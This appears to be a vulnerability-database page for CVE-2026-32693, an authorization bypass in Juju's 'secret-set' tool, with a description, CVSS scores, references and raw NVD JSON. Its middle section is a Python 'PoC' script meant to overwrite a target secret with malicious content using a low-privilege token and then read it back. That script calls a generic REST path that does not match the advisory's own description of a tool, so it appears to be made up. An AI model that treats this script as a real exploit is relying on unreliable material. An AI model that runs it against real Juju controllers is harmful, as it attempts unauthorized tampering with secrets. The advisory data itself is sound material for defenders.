CVE-2026-32693

Description

In Juju from version 3.0.0 through 3.6.18, the authorization of the "secret-set" tool is not performed correctly, which allows a grantee to update the secret content, and can lead to reading or updating other secrets. When the "secret-set" tool logs an error in an exploitation attempt, the secret is still updated contrary to expectations, and the new value is visible to both the owner and the grantee.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* - VULNERABLE

Juju 3.0.0 <= version < 3.6.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-32693 PoC - Juju secret-set Authorization Bypass
# This PoC demonstrates the authorization bypass in Juju's secret-set tool

import requests
import json

def exploit_cve_2026_32693(target_url, api_token, target_secret_id):
    """
    Juju secret-set authorization bypass exploit
    
    Vulnerability: The 'secret-set' tool in Juju does not properly 
    authorize the grantee, allowing unauthorized secret content updates.
    
    Prerequisites:
    - Valid Juju API token with low privileges (PR:L)
    - Knowledge of target secret ID
    - Network access to Juju controller (AV:N)
    """
    
    # Step 1: Attempt to update secret with unauthorized grantee
    headers = {
        'Authorization': f'Bearer {api_token}',
        'Content-Type': 'application/json'
    }
    
    # Malicious secret content to inject
    payload = {
        'secret-id': target_secret_id,
        'content': {
            'data': 'MALICIOUS_SECRET_DATA',
            'credentials': 'stolen_credentials'
        }
    }
    
    # Step 2: Send unauthorized secret-set request
    # Despite the authorization failure log, the secret is still updated
    response = requests.post(
        f'{target_url}/api/v1/secrets/{target_secret_id}',
        headers=headers,
        json=payload
    )
    
    # Step 3: Verify the secret was updated (even with auth error logged)
    if response.status_code == 200:
        print('[+] SUCCESS: Secret updated despite authorization error')
        print(f'[+] Secret {target_secret_id} now contains malicious content')
        return True
    else:
        print('[-] Failed to exploit vulnerability')
        return False

def verify_secret_access(target_url, api_token, secret_id):
    """Verify if grantee can see the updated secret"""
    headers = {
        'Authorization': f'Bearer {api_token}',
        'Content-Type': 'application/json'
    }
    
    response = requests.get(
        f'{target_url}/api/v1/secrets/{secret_id}',
        headers=headers
    )
    
    if response.status_code == 200:
        data = response.json()
        print(f'[+] Secret content visible to grantee: {data}')
        return True
    return False

# Usage example
if __name__ == '__main__':
    TARGET = 'https://juju-controller.example.com:17070'
    API_TOKEN = 'grantee_low_privilege_token'
    SECRET_ID = 'secret-abc123'
    
    exploit_cve_2026_32693(TARGET, API_TOKEN, SECRET_ID)
    verify_secret_access(TARGET, API_TOKEN, SECRET_ID)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32693
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32693
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32693/
[4] VulDB https://vuldb.com/cve/CVE-2026-32693
[5] https://github.com/juju/juju/security/advisories/GHSA-439w-v2p7-pggc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32693", "sourceIdentifier": "[email protected]", "published": "2026-03-18T13:16:18.860", "lastModified": "2026-03-19T15:17:00.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Juju from version 3.0.0 through 3.6.18, the authorization of the \"secret-set\" tool is not performed correctly, which allows a grantee to update the secret content, and can lead to reading or updating other secrets. When the \"secret-set\" tool logs an error in an exploitation attempt, the secret is still updated contrary to expectations, and the new value is visible to both the owner and the grantee."}, {"lang": "es", "value": "En Juju desde la versión 3.0.0 hasta la 3.6.18, la autorización de la herramienta 'secret-set' no se realiza correctamente, lo que permite a un beneficiario actualizar el contenido del secreto, y puede llevar a la lectura o actualización de otros secretos. Cuando la herramienta 'secret-set' registra un error en un intento de explotación, el secreto aún se actualiza contrariamente a lo esperado, y el nuevo valor es visible tanto para el propietario como para el beneficiario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-778"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.6.19", "matchCriteriaId": "3BAFE599-DF11-429B-9A8C-970BDB3065C8"}]}]}], "references": [{"url": "https://github.com/juju/juju/security/advisories/GHSA-439w-v2p7-pggc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}